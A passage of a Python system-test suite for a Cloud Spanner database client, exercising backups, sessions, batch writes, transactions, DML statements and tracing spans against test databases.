backup1 = Config.INSTANCE.backup(
backup_id_1,
database=self._dbs[0],
expire_time=expire_time_1,
version_time=self.database_version_time,
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by version time.
filter_ = 'version_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for colum in ALL_TYPES_COLUMNS])
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
[None for colum in EMULATOR_ALL_TYPES_COLUMNS]
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
# Call SetUpClass from parent (OpenTelemetryBase)
super(TestSessionAPI, cls).setUpClass()
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
if HAS_OPENTELEMETRY_INSTALLED:
self.ot_exporter.clear() # Clear any ot spans from above step.
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.ot_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.ot_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
@unittest.skipUnless(HAS_OPENTELEMETRY_INSTALLED, "trace requires OpenTelemetry")
def test_transaction_batch_update_w_parent_span(self):
from opentelemetry import trace
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if HAS_OPENTELEMETRY_INSTALLED:
self.ot_exporter.clear() # Clear any ot spans from above steps.
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.ot_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
request_options=RequestOptions(
priority=RequestOptions.Priority.PRIORITY_MEDIUM
),
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
